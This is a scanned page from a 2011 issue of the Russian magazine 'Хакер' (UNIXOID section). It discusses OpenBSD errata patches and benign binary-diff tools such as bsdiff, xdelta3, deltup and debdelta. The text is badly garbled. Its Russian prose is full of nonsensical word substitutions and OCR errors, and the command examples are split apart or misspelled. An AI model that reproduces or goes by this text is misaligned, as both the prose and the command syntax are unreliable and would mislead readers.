релизов равно заплатокдля

OpenBSD, знают, для насколько по отношению н самобытен равным образом

пр ост. При выпуске релизов разработчики живей орие н тируются возьми
вариант , нежели возьми сбор достаточн относительно го количества важных измене­

$ bsdiff старый_файл новый_файл файл_патча
$ bspatch старый_файл новый_файл файJ]_патча

ний . После выпуска новой версии ОС враз нач равным образом получи и распишись ется эксплуатация надо
следующей, а постоянно ошибки равным образом баги, н ай д енные на э т насчёт время, фиксятся со

через заплаток, которые всякий поль зовате л ь/адми н приходится

$
$

xdeltaЗ -е

-s стаgый обложка новый_файл файл_патча
xdeltaЗ -d -s стаgый_файл файл_патча новый_файл

от качать, нало обретаться бери начальный шифр равным образом пересобрать его. Делать зто

невыгодный всего лишь смертельно неудобно, же в отдельных случаях оборона сто далеко не пр едставляется воз­
можным. Многие железки по-под управлением

$ deltup -mjb 0

$ deltup

старый_файл новый_файл файл_патча

OpenBSD безграмотный обладают

накануне стато чной мощностью да дисковым ради со тран ством, пользу кого т ого так чтобы
иметь на иждивении на себя всё буревал исходных текстов

-р файл_патча

OpenBSD, компилятор,

лин ковщик да промежуточные результаты компиля ции . Но аж разве

$ debdelta

старый_файл новый_файл файл_патча

$ debpatch

-А файл_патча

ХАКЕР

00 / 053/2011

0 новый_файл

всё зто получи и распишись железке есть, а самоё кусок возле этом н е е дин ст во е нная

на подчинении, од нотипны е дей ствия nридетсявыnолнять сколько-нибудь

015

UNIXOID
З . С